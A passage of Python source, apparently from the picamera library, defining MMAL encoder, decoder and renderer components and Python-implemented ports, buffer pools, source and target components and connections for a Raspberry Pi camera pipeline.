component_type = mmal.MMAL_COMPONENT_DEFAULT_VIDEO_ENCODER
opaque_input_subformats = ('OPQV-dual',)
opaque_output_subformats = (None,)
class MMALImageEncoder(MMALEncoder):
"""
Represents the MMAL image encoder component. This component has 1 input
port and 1 output port. The output port is typically configured with
``MMAL_ENCODING_JPEG`` but can also use ``MMAL_ENCODING_PNG``,
``MMAL_ENCODING_GIF``, etc.
"""
__slots__ = ()
component_type = mmal.MMAL_COMPONENT_DEFAULT_IMAGE_ENCODER
opaque_input_subformats = ('OPQV-strips',)
opaque_output_subformats = (None,)
class MMALDecoder(MMALComponent):
"""
Represents a generic MMAL decoder. This is an abstract base class.
"""
__slots__ = ()
class MMALVideoDecoder(MMALDecoder):
"""
Represents the MMAL video decoder component. This component has 1 input
port and 1 output port. The input port is usually configured with
``MMAL_ENCODING_H264`` or ``MMAL_ENCODING_MJPEG``.
"""
__slots__ = ()
component_type = mmal.MMAL_COMPONENT_DEFAULT_VIDEO_DECODER
opaque_input_subformats = (None,)
opaque_output_subformats = ('OPQV-single',)
class MMALImageDecoder(MMALDecoder):
"""
    Represents the MMAL image decoder component. This component has 1 input
port and 1 output port. The input port is usually configured with
``MMAL_ENCODING_JPEG``.
"""
__slots__ = ()
component_type = mmal.MMAL_COMPONENT_DEFAULT_IMAGE_DECODER
opaque_input_subformats = (None,)
opaque_output_subformats = ('OPQV-single',)
class MMALRenderer(MMALComponent):
"""
Represents the MMAL renderer component. This component has 1 input port and
0 output ports. It is used to implement the camera preview and overlays.
"""
__slots__ = ()
component_type = mmal.MMAL_COMPONENT_DEFAULT_VIDEO_RENDERER
opaque_input_subformats = ('OPQV-single',)
class MMALNullSink(MMALComponent):
"""
Represents the MMAL null-sink component. This component has 1 input port
and 0 output ports. It is used to keep the preview port "alive" (and thus
calculating white-balance and exposure) when the camera preview is not
required.
"""
__slots__ = ()
component_type = mmal.MMAL_COMPONENT_DEFAULT_NULL_SINK
opaque_input_subformats = ('OPQV-single',)
class MMALPythonPort(MMALObject):
"""
Implements ports for Python-based MMAL components.
"""
__slots__ = (
'_buffer_count',
'_buffer_size',
'_connection',
'_enabled',
'_owner',
'_pool',
'_type',
'_index',
'_supported_formats',
'_format',
'_callback',
)
_FORMAT_BPP = {
'I420': 1.5,
'RGB3': 3,
'RGBA': 4,
'BGR3': 3,
'BGRA': 4,
}
def __init__(self, owner, port_type, index):
self._buffer_count = 2
self._buffer_size = 0
self._connection = None
self._enabled = False
self._owner = weakref.ref(owner)
self._pool = None
self._callback = None
self._type = port_type
self._index = index
self._supported_formats = {
mmal.MMAL_ENCODING_I420,
mmal.MMAL_ENCODING_RGB24,
mmal.MMAL_ENCODING_BGR24,
mmal.MMAL_ENCODING_RGBA,
mmal.MMAL_ENCODING_BGRA,
}
self._format = ct.pointer(mmal.MMAL_ES_FORMAT_T(
type=mmal.MMAL_ES_TYPE_VIDEO,
encoding=mmal.MMAL_ENCODING_I420,
es=ct.pointer(mmal.MMAL_ES_SPECIFIC_FORMAT_T())))
def close(self):
self.disconnect()
self.disable()
self._format = None
def __repr__(self):
return '<MMALPythonPort "%s": format=MMAL_FOURCC(%r) buffers=%dx%d frames=%s@%sfps>' % (
self.name, mmal.FOURCC_str(self.format), self.buffer_count,
self.buffer_size, self.framesize, self.framerate)
def _get_bitrate(self):
return self._format[0].bitrate
def _set_bitrate(self, value):
self._format[0].bitrate = value
bitrate = property(_get_bitrate, _set_bitrate, doc="""\
Retrieves or sets the bitrate limit for the port's format.
""")
def _get_supported_formats(self):
return self._supported_formats
def _set_supported_formats(self, value):
try:
value = {f for f in value}
except TypeError:
value = {value}
if not value:
raise PiCameraMMALError(
mmal.MMAL_EINVAL, "port must have at least one valid format")
self._supported_formats = value
supported_formats = property(_get_supported_formats, _set_supported_formats, doc="""\
Retrieves or sets the set of valid formats for this port. The set must
always contain at least one valid format. A single format can be
specified; it will be converted implicitly to a singleton set.
If the current port :attr:`format` is not a member of the new set, no
error is raised. An error will be raised when :meth:`commit` is next
called if :attr:`format` is still not a member of the set.
""")
def _get_format(self):
return self._format[0].encoding
def _set_format(self, value):
self._format[0].encoding = value
format = property(_get_format, _set_format, doc="""\
Retrieves or sets the encoding format of the port. Setting this
attribute implicitly sets the encoding variant to a sensible value
(I420 in the case of OPAQUE).
""")
def _get_framesize(self):
return PiResolution(
self._format[0].es[0].video.crop.width,
self._format[0].es[0].video.crop.height,
)
def _set_framesize(self, value):
value = to_resolution(value)
video = self._format[0].es[0].video
video.width = bcm_host.VCOS_ALIGN_UP(value.width, 32)
video.height = bcm_host.VCOS_ALIGN_UP(value.height, 16)
video.crop.width = value.width
video.crop.height = value.height
framesize = property(_get_framesize, _set_framesize, doc="""\
Retrieves or sets the size of the source's video frames as a (width,
height) tuple. This attribute implicitly handles scaling the given
size up to the block size of the camera (32x16).
""")
def _get_framerate(self):
video = self._format[0].es[0].video
try:
return Fraction(
video.frame_rate.num,
video.frame_rate.den)
except ZeroDivisionError:
return Fraction(0, 1)
def _set_framerate(self, value):
value = to_fraction(value)
video = self._format[0].es[0].video
video.frame_rate.num = value.numerator
video.frame_rate.den = value.denominator
framerate = property(_get_framerate, _set_framerate, doc="""\
Retrieves or sets the framerate of the port's video frames in fps.
""")
@property
def pool(self):
"""
        Returns the :class:`MMALPool` associated with the port, if any.
"""
return self._pool
@property
def opaque_subformat(self):
return None
def _get_buffer_count(self):
return self._buffer_count
def _set_buffer_count(self, value):
if value < 1:
raise PiCameraMMALError(mmal.MMAL_EINVAL, 'buffer count <1')
self._buffer_count = int(value)
buffer_count = property(_get_buffer_count, _set_buffer_count, doc="""\
The number of buffers allocated (or to be allocated) to the port. The
default is 2 but more may be required in the case of long pipelines
with replicated buffers.
""")
def _get_buffer_size(self):
return self._buffer_size
def _set_buffer_size(self, value):
if value < 0:
raise PiCameraMMALError(mmal.MMAL_EINVAL, 'buffer size <0')
self._buffer_size = value
buffer_size = property(_get_buffer_size, _set_buffer_size, doc="""\
The size of buffers allocated (or to be allocated) to the port. The
size of buffers defaults to a value dictated by the port's format.
""")
def copy_from(self, source):
"""
Copies the port's :attr:`format` from the *source*
:class:`MMALControlPort`.
"""
if isinstance(source, MMALPythonPort):
mmal.mmal_format_copy(self._format, source._format)
else:
mmal.mmal_format_copy(self._format, source._port[0].format)
def commit(self):
"""
Commits the port's configuration and automatically updates the number
and size of associated buffers. This is typically called after
adjusting the port's format and/or associated settings (like width and
height for video ports).
"""
if self.format not in self.supported_formats:
raise PiCameraMMALError(
mmal.MMAL_EINVAL, 'invalid format for port %r' % self)
self._buffer_count = 2
video = self._format[0].es[0].video
try:
self._buffer_size = int(
MMALPythonPort._FORMAT_BPP[str(self.format)]
* video.width
* video.height)
except KeyError:
# If it's an unknown / encoded format just leave the buffer size
# alone and hope the owning component knows what to set
pass
self._owner()._commit_port(self)
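# Worked example of the sizing above (a sketch): I420 carries 1.5 bytes per
# pixel, so committing a 1920x1088 port yields buffer_size =
# int(1.5 * 1920 * 1088) == 3133440 bytes, with buffer_count reset to 2.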
@property
def enabled(self):
"""
Returns a :class:`bool` indicating whether the port is currently
enabled. Unlike other classes, this is a read-only property. Use
:meth:`enable` and :meth:`disable` to modify the value.
"""
return self._enabled
def enable(self, callback=None):
"""
Enable the port with the specified callback function (this must be
``None`` for connected ports, and a callable for disconnected ports).
The callback function must accept two parameters which will be this
:class:`MMALControlPort` (or descendent) and an :class:`MMALBuffer`
instance. Any return value will be ignored.
"""
if self._connection is not None:
if callback is not None:
raise PiCameraMMALError(
mmal.MMAL_EINVAL,
'connected ports must be enabled without callback')
else:
if callback is None:
raise PiCameraMMALError(
mmal.MMAL_EINVAL,
'unconnected ports must be enabled with callback')
if self.type == mmal.MMAL_PORT_TYPE_INPUT or self._connection is None:
self._pool = MMALPythonPortPool(self)
self._callback = callback
self._enabled = True
def disable(self):
"""
Disable the port.
"""
self._enabled = False
if self._pool is not None:
# Release any unprocessed buffers from the owner's queue before
# we destroy them all
while True:
buf = self._owner()._queue.get(False)
if buf:
buf.release()
else:
break
self._pool.close()
self._pool = None
self._callback = None
def get_buffer(self, block=True, timeout=None):
"""
Returns a :class:`MMALBuffer` from the associated :attr:`pool`. *block*
and *timeout* act as they do in the corresponding
:meth:`MMALPool.get_buffer`.
"""
if not self._enabled:
raise PiCameraPortDisabled(
'cannot get buffer from disabled port %s' % self.name)
if self._pool is not None:
# Unconnected port or input port case; retrieve buffer from the
# allocated pool
return self._pool.get_buffer(block, timeout)
else:
# Connected output port case; get a buffer from the target input
# port (in this case the port is just a thin proxy for the
# corresponding input port)
assert self.type == mmal.MMAL_PORT_TYPE_OUTPUT
return self._connection.target.get_buffer(block, timeout)
def send_buffer(self, buf):
"""
Send :class:`MMALBuffer` *buf* to the port.
"""
# NOTE: The MMALPythonConnection callback must occur *before* the test
# for the port being enabled; after all, it's meant to be the connection
# making the callback before the buffer reaches the port
if (
self.type == mmal.MMAL_PORT_TYPE_INPUT and
self._connection._callback is not None):
try:
modified_buf = self._connection._callback(self._connection, buf)
except:
buf.release()
raise
else:
if modified_buf is None:
buf.release()
else:
buf = modified_buf
if not self._enabled:
raise PiCameraPortDisabled(
'cannot send buffer to disabled port %s' % self.name)
if self._callback is not None:
try:
# XXX Return value? If it's an input port we should ignore it,
# but what about output ports?
self._callback(self, buf)
except:
buf.release()
raise
if self._type == mmal.MMAL_PORT_TYPE_INPUT:
# Input port case; queue the buffer for processing on the
# owning component
self._owner()._queue.put(buf)
elif self._connection is None:
# Unconnected output port case; release the buffer back to the
# pool
buf.release()
else:
# Connected output port case; forward the buffer to the
# connected component's input port
# XXX If it's a format-change event?
self._connection.target.send_buffer(buf)
@property
def name(self):
return '%s:%s:%d' % (self._owner().name, {
mmal.MMAL_PORT_TYPE_OUTPUT: 'out',
mmal.MMAL_PORT_TYPE_INPUT: 'in',
mmal.MMAL_PORT_TYPE_CONTROL: 'control',
mmal.MMAL_PORT_TYPE_CLOCK: 'clock',
}[self.type], self._index)
@property
def type(self):
"""
The type of the port. One of:
* MMAL_PORT_TYPE_OUTPUT
* MMAL_PORT_TYPE_INPUT
* MMAL_PORT_TYPE_CONTROL
* MMAL_PORT_TYPE_CLOCK
"""
return self._type
@property
def capabilities(self):
"""
The capabilities of the port. A bitfield of the following:
* MMAL_PORT_CAPABILITY_PASSTHROUGH
* MMAL_PORT_CAPABILITY_ALLOCATION
* MMAL_PORT_CAPABILITY_SUPPORTS_EVENT_FORMAT_CHANGE
"""
return mmal.MMAL_PORT_CAPABILITY_SUPPORTS_EVENT_FORMAT_CHANGE
@property
def index(self):
"""
Returns an integer indicating the port's position within its owning
list (inputs, outputs, etc.)
"""
return self._index
@property
def connection(self):
"""
If this port is connected to another, this property holds the
:class:`MMALConnection` or :class:`MMALPythonConnection` object which
represents that connection. If this port is not connected, this
property is ``None``.
"""
return self._connection
def connect(self, other, **options):
"""
Connect this port to the *other* :class:`MMALPort` (or
:class:`MMALPythonPort`). The type and configuration of the connection
will be automatically selected.
Various connection options can be specified as keyword arguments. These
will be passed onto the :class:`MMALConnection` or
:class:`MMALPythonConnection` constructor that is called (see those
classes for an explanation of the available options).
"""
# Always construct connections from the output end
if self.type != mmal.MMAL_PORT_TYPE_OUTPUT:
return other.connect(self, **options)
if other.type != mmal.MMAL_PORT_TYPE_INPUT:
raise PiCameraValueError(
'A connection can only be established between an output and '
'an input port')
return MMALPythonConnection(self, other, **options)
def disconnect(self):
"""
Destroy the connection between this port and another port.
"""
if self.connection is not None:
self.connection.close()
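# A minimal sketch of configuring an output port and wiring it to an input
# port with connect(); "source" and "target" stand for hypothetical
# components built from the classes in this module.
def _example_connect_ports(source, target):
    out = source.outputs[0]
    out.format = mmal.MMAL_ENCODING_I420
    out.framesize = (1280, 720)
    out.framerate = 30
    out.commit()  # validates the format against supported_formats
    # connect() always constructs the connection from the output end;
    # calling it on an input port simply delegates to the other side
    conn = out.connect(target.inputs[0])
    conn.enable()
    return conn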
class MMALPythonPortPool(MMALPool):
"""
Creates a pool of buffer headers for an :class:`MMALPythonPort`. This is
only used when a fake port is used without a corresponding
:class:`MMALPythonConnection`.
"""
__slots__ = ('_port',)
def __init__(self, port):
super(MMALPythonPortPool, self).__init__(
mmal.mmal_pool_create(port.buffer_count, port.buffer_size))
self._port = port
@property
def port(self):
return self._port
def send_buffer(self, port=None, block=True, timeout=None):
"""
Get a buffer from the pool and send it to *port* (or the port the pool
is associated with by default). *block* and *timeout* act as they do in
:meth:`MMALPool.get_buffer`.
"""
if port is None:
port = self._port
super(MMALPythonPortPool, self).send_buffer(port, block, timeout)
def send_all_buffers(self, port=None, block=True, timeout=None):
"""
Send all buffers from the pool to *port* (or the port the pool is
associated with by default). *block* and *timeout* act as they do in
:meth:`MMALPool.get_buffer`.
"""
if port is None:
port = self._port
super(MMALPythonPortPool, self).send_all_buffers(port, block, timeout)
class MMALPythonBaseComponent(MMALObject):
"""
Base class for Python-implemented MMAL components. This class provides the
:meth:`_commit_port` method used by descendents to control their ports'
behaviour, and the :attr:`enabled` property. However, it is unlikely that
users will want to sub-class this directly. See
:class:`MMALPythonComponent` for a more useful starting point.
"""
__slots__ = ('_inputs', '_outputs', '_enabled',)
def __init__(self):
super(MMALPythonBaseComponent, self).__init__()
self._enabled = False
self._inputs = ()
self._outputs = ()
# TODO Control port?
def close(self):
"""
Close the component and release all its resources. After this is
called, most methods will raise exceptions if called.
"""
self.disable()
@property
def enabled(self):
"""
Returns ``True`` if the component is currently enabled. Use
:meth:`enable` and :meth:`disable` to control the component's state.
"""
return self._enabled
def enable(self):
"""
Enable the component. When a component is enabled it will process data
sent to its input port(s), sending the results to buffers on its output
port(s). Components may be implicitly enabled by connections.
"""
self._enabled = True
def disable(self):
"""
Disables the component.
"""
self._enabled = False
@property
def control(self):
"""
The :class:`MMALControlPort` control port of the component which can be
used to configure most aspects of the component's behaviour.
"""
return None
@property
def inputs(self):
"""
A sequence of :class:`MMALPort` objects representing the inputs
of the component.
"""
return self._inputs
@property
def outputs(self):
"""
A sequence of :class:`MMALPort` objects representing the outputs
of the component.
"""
return self._outputs
def _commit_port(self, port):
"""
Called by ports when their format is committed. Descendents may
override this to reconfigure output ports when input ports are
committed, or to raise errors if the new port configuration is
unacceptable.
.. warning::
This method must *not* reconfigure input ports when called; however
it can reconfigure *output* ports when input ports are committed.
"""
pass
def __repr__(self):
if self._outputs:
return '<%s "%s": %d inputs %d outputs>' % (
self.__class__.__name__, self.name,
len(self.inputs), len(self.outputs))
else:
return '<%s closed>' % self.__class__.__name__
class MMALPythonSource(MMALPythonBaseComponent):
"""
Provides a source for other :class:`MMALComponent` instances. The
specified *input* is read in chunks the size of the configured output
buffer(s) until the input is exhausted. The :meth:`wait` method can be
used to block until this occurs. If the output buffer is configured to
use a full-frame unencoded format (like I420 or RGB), frame-end flags will
be automatically generated by the source. When the input is exhausted an
empty buffer with the End Of Stream (EOS) flag will be sent.
The component provides all picamera's usual IO-handling characteristics; if
*input* is a string, a file with that name will be opened as the input and
closed implicitly when the component is closed. Otherwise, the input will
not be closed implicitly (the component did not open it, so the assumption
is that closing *input* is the caller's responsibility). If *input* is an
object with a ``read`` method it is assumed to be a file-like object and is
used as is. Otherwise, *input* is assumed to be a readable object
supporting the buffer protocol (which is wrapped in a :class:`BufferIO`
stream).
"""
__slots__ = ('_stream', '_opened', '_thread')
def __init__(self, input):
super(MMALPythonSource, self).__init__()
self._inputs = ()
self._outputs = (MMALPythonPort(self, mmal.MMAL_PORT_TYPE_OUTPUT, 0),)
self._stream, self._opened = open_stream(input, output=False)
self._thread = None
def close(self):
super(MMALPythonSource, self).close()
if self._outputs:
self._outputs[0].close()
self._outputs = ()
if self._stream:
close_stream(self._stream, self._opened)
self._stream = None
def enable(self):
super(MMALPythonSource, self).enable()
self._thread = Thread(target=self._send_run)
self._thread.daemon = True
self._thread.start()
def disable(self):
super(MMALPythonSource, self).disable()
if self._thread:
self._thread.join()
self._thread = None
def wait(self, timeout=None):
"""
Wait for the source to send all bytes from the specified input. If
*timeout* is specified, it is the number of seconds to wait for
completion. The method returns ``True`` if the source completed within
the specified timeout and ``False`` otherwise.
"""
if not self.enabled:
raise PiCameraMMALError(
mmal.MMAL_EINVAL, 'cannot wait on disabled component')
self._thread.join(timeout)
return not self._thread.is_alive()
def _send_run(self):
# Calculate the size of a frame if possible (i.e. when the output
# format is an unencoded full frame format). If it's an unknown /
# encoded format, we've no idea what the framesize is (this would
# presumably require decoding the stream) so leave framesize as None.
video = self._outputs[0]._format[0].es[0].video
try:
framesize = (
MMALPythonPort._FORMAT_BPP[str(self._outputs[0].format)]
* video.width
* video.height)
except KeyError:
framesize = None
frameleft = framesize
while self.enabled:
buf = self._outputs[0].get_buffer(timeout=0.1)
if buf:
try:
if frameleft is None:
send = buf.size
else:
send = min(frameleft, buf.size)
with buf as data:
if send == buf.size:
try:
# readinto() is by far the fastest method of
# getting data into the buffer
buf.length = self._stream.readinto(data)
except AttributeError:
# if there's no readinto() method, fallback on
# read() and the data setter (memmove)
buf.data = self._stream.read(buf.size)
else:
buf.data = self._stream.read(send)
if frameleft is not None:
frameleft -= buf.length
if not frameleft:
buf.flags |= mmal.MMAL_BUFFER_HEADER_FLAG_FRAME_END
frameleft = framesize
if not buf.length:
buf.flags |= mmal.MMAL_BUFFER_HEADER_FLAG_EOS
break
finally:
self._outputs[0].send_buffer(buf)
@property
def name(self):
return 'py.source'
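# A minimal sketch of draining an MMALPythonSource stand-alone (the file
# name is hypothetical): an unconnected output port must be enabled with a
# callback, and since send_buffer() releases unconnected buffers itself the
# callback only needs to inspect them.
def _example_drain_source(filename='frames.yuv'):
    source = MMALPythonSource(filename)
    port = source.outputs[0]
    port.format = mmal.MMAL_ENCODING_I420
    port.framesize = (640, 480)
    port.commit()
    port.enable(lambda p, buf: None)  # inspect buf here if required
    source.enable()
    source.wait()  # blocks until the EOS buffer has been sent
    source.close()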
class MMALPythonComponent(MMALPythonBaseComponent):
"""
Provides a Python-based MMAL component with a *name*, a single input and
the specified number of *outputs* (default 1). The :meth:`connect` and
:meth:`disconnect` methods can be used to establish or break a connection
from the input port to an upstream component.
Typically descendents will override the :meth:`_handle_frame` method to
respond to buffers sent to the input port, and will set
:attr:`MMALPythonPort.supported_formats` in the constructor to define the
formats that the component will work with.
"""
__slots__ = ('_name', '_thread', '_queue', '_error')
def __init__(self, name='py.component', outputs=1):
super(MMALPythonComponent, self).__init__()
self._name = name
self._thread = None
self._error = None
self._queue = MMALQueue.create()
self._inputs = (MMALPythonPort(self, mmal.MMAL_PORT_TYPE_INPUT, 0),)
self._outputs = tuple(
MMALPythonPort(self, mmal.MMAL_PORT_TYPE_OUTPUT, n)
for n in range(outputs)
)
def close(self):
super(MMALPythonComponent, self).close()
self.disconnect()
if self._inputs:
self._inputs[0].close()
self._inputs = ()
for output in self._outputs:
output.disable()
self._outputs = ()
self._queue.close()
self._queue = None
def connect(self, source, **options):
"""
Connects the input port of this component to the specified *source*
:class:`MMALPort` or :class:`MMALPythonPort`. Alternatively, as a
convenience (primarily intended for command line experimentation; don't
use this in scripts), *source* can be another component in which case
the first unconnected output port will be selected as *source*.
Keyword arguments will be passed along to the connection constructor.
See :class:`MMALConnection` and :class:`MMALPythonConnection` for
further information.
"""
if isinstance(source, (MMALPort, MMALPythonPort)):
return self.inputs[0].connect(source)
else:
for port in source.outputs:
if not port.connection:
return self.inputs[0].connect(port, **options)
raise PiCameraMMALError(
mmal.MMAL_EINVAL, 'no free output ports on %r' % source)
def disconnect(self):
"""
Destroy the connection between this component's input port and the
upstream component.
"""
self.inputs[0].disconnect()
@property
def connection(self):
"""
The :class:`MMALConnection` or :class:`MMALPythonConnection` object
linking this component to the upstream component.
"""
return self.inputs[0].connection
@property
def name(self):
return self._name
def _commit_port(self, port):
"""
Overridden to copy the input port's configuration to the output
port(s), and to ensure that the output port(s)' format(s) match
the input port's format.
"""
super(MMALPythonComponent, self)._commit_port(port)
if port.type == mmal.MMAL_PORT_TYPE_INPUT:
for output in self.outputs:
output.copy_from(port)
elif port.type == mmal.MMAL_PORT_TYPE_OUTPUT:
if port.format != self.inputs[0].format:
raise PiCameraMMALError(mmal.MMAL_EINVAL, 'output format mismatch')
def enable(self):
super(MMALPythonComponent, self).enable()
if not self._thread:
self._thread = Thread(target=self._thread_run)
self._thread.daemon = True
self._thread.start()
def disable(self):
super(MMALPythonComponent, self).disable()
if self._thread:
self._thread.join()
self._thread = None
if self._error:
raise self._error
def _thread_run(self):
try:
while self._enabled:
buf = self._queue.get(timeout=0.1)
if buf:
try:
handler = {
0: self._handle_frame,
mmal.MMAL_EVENT_PARAMETER_CHANGED: self._handle_parameter_changed,
mmal.MMAL_EVENT_FORMAT_CHANGED: self._handle_format_changed,
mmal.MMAL_EVENT_ERROR: self._handle_error,
mmal.MMAL_EVENT_EOS: self._handle_end_of_stream,
}[buf.command]
if handler(self.inputs[0], buf):
self._enabled = False
finally:
buf.release()
except Exception as e:
self._error = e
self._enabled = False
def _handle_frame(self, port, buf):
"""
Handles frame data buffers (where :attr:`MMALBuffer.command` is set to
0).
Typically, if the component has output ports, the method is expected to
fetch a buffer from the output port(s), write data into them, and send
them back to their respective ports.
Return values are as for normal event handlers (``True`` when no more
buffers are expected, ``False`` otherwise).
"""
return False
def _handle_format_changed(self, port, buf):
"""
Handles format change events passed to the component (where
:attr:`MMALBuffer.command` is set to MMAL_EVENT_FORMAT_CHANGED).
The default implementation re-configures the input port of the
component and emits the event on all output ports for downstream
processing. Override this method if you wish to do something else in
response to format change events.
The *port* parameter is the port into which the event arrived, and
*buf* contains the event itself (a MMAL_EVENT_FORMAT_CHANGED_T
structure). Use ``mmal_event_format_changed_get`` on the buffer's data
to extract the event.
"""
with buf as data:
event = mmal.mmal_event_format_changed_get(buf._buf)
if port.connection:
# Handle format change on the source output port, if any. We
# don't check the output port capabilities because it was the
# port that emitted the format change in the first case so it'd
# be odd if it didn't support them (or the format requested)!
output = port.connection._source
output.disable()
if isinstance(output, MMALPythonPort):
mmal.mmal_format_copy(output._format, event[0].format)
else:
mmal.mmal_format_copy(output._port[0].format, event[0].format)
output.commit()
output.buffer_count = (
event[0].buffer_num_recommended
if event[0].buffer_num_recommended > 0 else
event[0].buffer_num_min)
output.buffer_size = (
event[0].buffer_size_recommended
if event[0].buffer_size_recommended > 0 else
event[0].buffer_size_min)
if isinstance(output, MMALPythonPort):
output.enable()
else:
output.enable(port.connection._transfer)
# Now deal with the format change on this input port (this is only
# called from _thread_run so port must be an input port)
try:
if not (port.capabilities & mmal.MMAL_PORT_CAPABILITY_SUPPORTS_EVENT_FORMAT_CHANGE):
raise PiCameraMMALError(
mmal.MMAL_EINVAL,
'port %s does not support event change' % port.name)
mmal.mmal_format_copy(port._format, event[0].format)
self._commit_port(port)
port.pool.resize(
event[0].buffer_num_recommended
if event[0].buffer_num_recommended > 0 else
event[0].buffer_num_min,
event[0].buffer_size_recommended
if event[0].buffer_size_recommended > 0 else
event[0].buffer_size_min)
port.buffer_count = len(port.pool)
port.buffer_size = port.pool[0].size
except:
# If this port can't handle the format change, or if anything goes
# wrong (like the owning component doesn't like the new format)
# stop the pipeline (from here at least)
if port.connection:
port.connection.disable()
raise
# Chain the format-change onward so everything downstream sees it.
# NOTE: the callback isn't given the format-change because there's no
# image data in it
for output in self.outputs:
out_buf = output.get_buffer()
out_buf.copy_from(buf)
output.send_buffer(out_buf)
return False
def _handle_parameter_changed(self, port, buf):
"""
Handles parameter change events passed to the component (where
:attr:`MMALBuffer.command` is set to MMAL_EVENT_PARAMETER_CHANGED).
The default implementation does nothing but return ``False``
(indicating that processing should continue). Override this in
descendents to respond to parameter changes.
The *port* parameter is the port into which the event arrived, and
*buf* contains the event itself (a MMAL_EVENT_PARAMETER_CHANGED_T
structure).
"""
return False
def _handle_error(self, port, buf):
"""
Handles error notifications passed to the component (where
:attr:`MMALBuffer.command` is set to MMAL_EVENT_ERROR).
The default implementation does nothing but return ``True`` (indicating
that processing should halt). Override this in descendents to respond
to error events.
The *port* parameter is the port into which the event arrived.
"""
return True
def _handle_end_of_stream(self, port, buf):
"""
Handles end-of-stream notifications passed to the component (where
:attr:`MMALBuffer.command` is set to MMAL_EVENT_EOS).
The default implementation does nothing but return ``True`` (indicating
that processing should halt). Override this in descendents to respond
to the end of stream.
The *port* parameter is the port into which the event arrived.
"""
return True
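# A minimal sketch of the subclassing pattern described in the class
# docstring above: override _handle_frame() to copy each input buffer to an
# output buffer (a real filter would transform the data in between). It
# assumes the output port has already been connected or enabled.
class _ExamplePassThrough(MMALPythonComponent):
    def __init__(self):
        super(_ExamplePassThrough, self).__init__(name='py.passthrough')
    def _handle_frame(self, port, buf):
        out = self.outputs[0].get_buffer(timeout=0.1)
        if out:
            out.copy_from(buf)
            self.outputs[0].send_buffer(out)
        return False  # keep processing further buffers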
class MMALPythonTarget(MMALPythonComponent):
"""
Provides a simple component that writes all received buffers to the
specified *output* until a frame with the *done* flag is seen (defaults to
MMAL_BUFFER_HEADER_FLAG_EOS indicating End Of Stream).
The component provides all picamera's usual IO-handling characteristics; if
*output* is a string, a file with that name will be opened as the output
and closed implicitly when the component is closed. Otherwise, the output
will not be closed implicitly (the component did not open it, so the
assumption is that closing *output* is the caller's responsibility). If
*output* is an object with a ``write`` method it is assumed to be a
file-like object and is used as is. Otherwise, *output* is assumed to be a
writeable object supporting the buffer protocol (which is wrapped in a
:class:`BufferIO` stream).
"""
__slots__ = ('_opened', '_stream', '_done', '_event')
def __init__(self, output, done=mmal.MMAL_BUFFER_HEADER_FLAG_EOS):
super(MMALPythonTarget, self).__init__(name='py.target', outputs=0)
self._stream, self._opened = open_stream(output)
self._done = done
self._event = Event()
# Accept all the formats picamera generally produces (user can add
# other esoteric stuff if they need to)
self.inputs[0].supported_formats = {
mmal.MMAL_ENCODING_MJPEG,
mmal.MMAL_ENCODING_H264,
mmal.MMAL_ENCODING_JPEG,
mmal.MMAL_ENCODING_GIF,
mmal.MMAL_ENCODING_PNG,
mmal.MMAL_ENCODING_BMP,
mmal.MMAL_ENCODING_I420,
mmal.MMAL_ENCODING_RGB24,
mmal.MMAL_ENCODING_BGR24,
mmal.MMAL_ENCODING_RGBA,
mmal.MMAL_ENCODING_BGRA,
}
def close(self):
super(MMALPythonTarget, self).close()
close_stream(self._stream, self._opened)
def enable(self):
self._event.clear()
super(MMALPythonTarget, self).enable()
def wait(self, timeout=None):
"""
Wait for the output to be "complete" as defined by the constructor's
*done* parameter. If *timeout* is specified it is the number of seconds
to wait for completion. The method returns ``True`` if the target
completed within the specified timeout and ``False`` otherwise.
"""
return self._event.wait(timeout)
def _handle_frame(self, port, buf):
self._stream.write(buf.data)
if buf.flags & self._done:
self._event.set()
return True
return False
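# A minimal sketch of an end-to-end pure-Python pipeline built from the
# classes above (file names are hypothetical; the exact enable ordering is
# an assumption).
def _example_pipeline():
    source = MMALPythonSource('input.yuv')
    source.outputs[0].format = mmal.MMAL_ENCODING_I420
    source.outputs[0].framesize = (640, 480)
    source.outputs[0].commit()
    target = MMALPythonTarget('output.yuv')
    target.connect(source)  # selects the first free output port
    target.connection.enable()
    source.enable()
    target.enable()
    target.wait()  # returns True once the EOS flag has been seen
    source.close()
    target.close()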
class MMALPythonConnection(MMALBaseConnection):
"""
Represents a connection between an :class:`MMALPythonBaseComponent` and a
:class:`MMALBaseComponent` or another :class:`MMALPythonBaseComponent`.
The constructor accepts arguments providing the *source* :class:`MMALPort`
(or :class:`MMALPythonPort`) and *target* :class:`MMALPort` (or
:class:`MMALPythonPort`).
The *formats* parameter specifies an iterable of formats (in preference
order) that the connection may attempt when negotiating formats between
the two ports. If this is ``None``, or an empty iterable, no negotiation
will take place and the source port's format will simply be copied to the
target port. Otherwise, the iterable will be worked through in order until
a format acceptable to both ports is discovered.
The *callback* parameter can optionally specify a callable which will be
executed for each buffer that traverses the connection (providing an
opportunity to manipulate or drop that buffer). If specified, it must be a
callable which accepts two parameters: the :class:`MMALPythonConnection`
object sending the data, and the :class:`MMALBuffer` object containing
data. The callable may optionally manipulate the :class:`MMALBuffer` and
return it to permit it to continue traversing the connection, or return
``None`` in which case the buffer will be released.
.. data:: default_formats
:annotation: = (MMAL_ENCODING_I420, MMAL_ENCODING_RGB24, MMAL_ENCODING_BGR24, MMAL_ENCODING_RGBA, MMAL_ENCODING_BGRA)
Class attribute defining the default formats used to negotiate
connections between Python and MMAL components, in preference
order. Note that OPAQUE is not present in contrast with the default
formats in :class:`MMALConnection`.
"""
__slots__ = ('_enabled', '_callback')
default_formats = (
mmal.MMAL_ENCODING_I420,
mmal.MMAL_ENCODING_RGB24,
mmal.MMAL_ENCODING_BGR24,
mmal.MMAL_ENCODING_RGBA,
mmal.MMAL_ENCODING_BGRA,
)
def __init__(
self, source, target, formats=default_formats, callback=None):
if not (
isinstance(source, MMALPythonPort) or
isinstance(target, MMALPythonPort)
):
raise PiCameraValueError('use a real MMAL connection')
super(MMALPythonConnection, self).__init__(source, target, formats)
self._enabled = False
self._callback = callback
def close(self):
self.disable()
super(MMALPythonConnection, self).close()
@property
def enabled(self):
"""
Returns ``True`` if the connection is enabled. Use :meth:`enable`
and :meth:`disable` to control the state of the connection.
"""
return self._enabled
def enable(self):
"""
Enable the connection. When a connection is enabled, data is
continually transferred from the output port of the source to the input
port of the target component.
"""
if not self._enabled:
self._enabled = True
if isinstance(self._target, MMALPythonPort):
# Connected python input ports require no callback
self._target.enable()
else:
# Connected MMAL input ports don't know they're connected so
# provide a dummy callback
self._target.params[mmal.MMAL_PARAMETER_ZERO_COPY] = True
self._target.enable(lambda port, buf: True)
if isinstance(self._source, MMALPythonPort):
# Connected python output ports are nothing more than thin
# proxies for the target input port; no callback required
self._source.enable()
else:
